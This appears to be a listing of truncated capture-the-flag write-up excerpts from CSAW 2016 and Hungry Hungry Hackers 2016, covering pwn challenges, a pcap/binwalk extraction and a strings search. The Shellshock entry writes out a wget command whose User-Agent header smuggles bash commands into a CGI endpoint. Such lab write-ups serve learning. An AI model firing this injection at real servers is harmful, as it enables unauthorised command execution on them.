200 CSAW2016 Tutorial

Running the application, there is immediately a seg fault.

    λ ./tutorial
    Segmentation fault (core dumped)

Open in IDA to see what's going on.

    void __fastcall __noreturn main(__int64 a1, char **a2, char **a3){
      v15 = *MK_FP(__FS__, 40LL);
      optval = 1;
      sigemptyset(&v4);
      fd = socket(2, 1, 0);
      if ( fd…

50 CSAW2016 Warm-Up

Check the run.sh script located in the docker folder.

We are given an executable to download with the description: "So you want to be a pwn-er huh? Well let's throw you an easy one ;)"

Check for the easy stuff

Running file says it's a 32-bit ELF but before…

Hungry Hungry Hackers Shellshock

As the name suggests, this is probably a Shellshock vulnerability. You can test for it below.

Test

    wget -U "() { test;};echo \"Content-type: text/html\"; echo; echo; pwd;" http://10.10.10.54:8000/cgi-bin/board

Basically the webserver is vulnerable to executing bash commands on the server. This means that…

Hungry Hungry Hackers 2016 Look Twice

Was given a pcap file of packet captures. Found a PDF that was transferred in the packets and was able to extract it. Then used binwalk on the PDF, and the below is my bash output:

    $ binwalk flag.pdf
    DECIMAL    HEX    DESCRIPTION
    --------------------------------------------
    0          0x0    gzip compressed data,
    $ ls
    0…

Hungry Hungry Hackers 2016 Image Corruption

Just strings and grep

    $ strings flag.png | grep "flag"
    <photoshop:LayerName>The Flag is: ----------</photoshop:LayerName>…